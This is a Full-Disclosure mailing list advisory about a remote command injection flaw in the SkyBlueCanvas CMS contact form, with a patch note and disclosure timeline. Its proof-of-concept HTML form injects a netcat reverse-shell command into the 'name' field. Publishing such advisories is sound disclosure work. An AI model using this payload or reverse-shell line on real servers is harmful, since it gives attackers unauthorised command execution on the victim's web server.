| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 23 Jan 2014 20:44:54 +0000 From: Scott Parish <Scott.Parish@...ecurity.org> To: "'full-disclosure@...ts.grok.org.uk'" <full-disclosure@...ts.grok.org.uk> Subject: Remote Command Injection Vulnerability in SkyBlueCanvas CMS Vulnerability in SkyBlueCanvas CMS Vulnerability Type: Remote Command Injection Version Affected: 1.1 r248-03 (and probably prior versions) Discovered by: Scott Parish - Center for Internet Security Vendor Information: SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it simple to keep the content of your site fresh. You simply upload the software to your web server, and you are ready to start adding text and pictures to your web site. Vulnerability Details: The SkyBlueCanvas Lightweight CMS application contains a remote command injection vulnerability within the form on the Contact page. A remote un-authenticated user can exploit this vulnerability to force the webserver to execute commands in the context of the vulnerable application. It is possible to exploit this vulnerability because the POST parameters "name", "email", "subject", and "message" are not properly sanitized when submitted to the index.php?pid=4 page. Arbitrary commands can be executed by injecting the following payload to a vulnerable parameter: A"; <command> Since the page does not display the results of the injected command (blind injection) then testing must be done using a ping, nc, or similar command. Proof of Concept Exploit Code: <html> <body> <form action="http://localhost/index.php?pid=4" method="post"> <input type="hidden" name="cid" value="3"> <input type="hidden" name="name" value="test"; nc -e /bin/sh 192.168.1.2 12345"> <input type="hidden" name="email" value="test"> <input type="hidden" name="subject" value="test"> <input type="hidden" name="message" value="test"> <input type="hidden" name="action" value="Send"> <input type="submit" value="submit"> </form> </body> </html> References: http://skybluecanvas.com/ Remediation: The vendor has issued a fix to the vulnerability in version 1.1 r248-04 Revision History: 1/9/14 - Vulnerability discovered 1/10/14 - Vulnerability disclosed privately to vendor 1/22/14 - Patch released by vendor 1/23/14 - Vulnerability disclosed publicly This message and attachments may contain confidential information. If it appears that this message was sent to you by mistake, any retention, dissemination, distribution or copying of this message and attachments is strictly prohibited. Please notify the sender immediately and permanently delete the message and any attachments. . . . _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists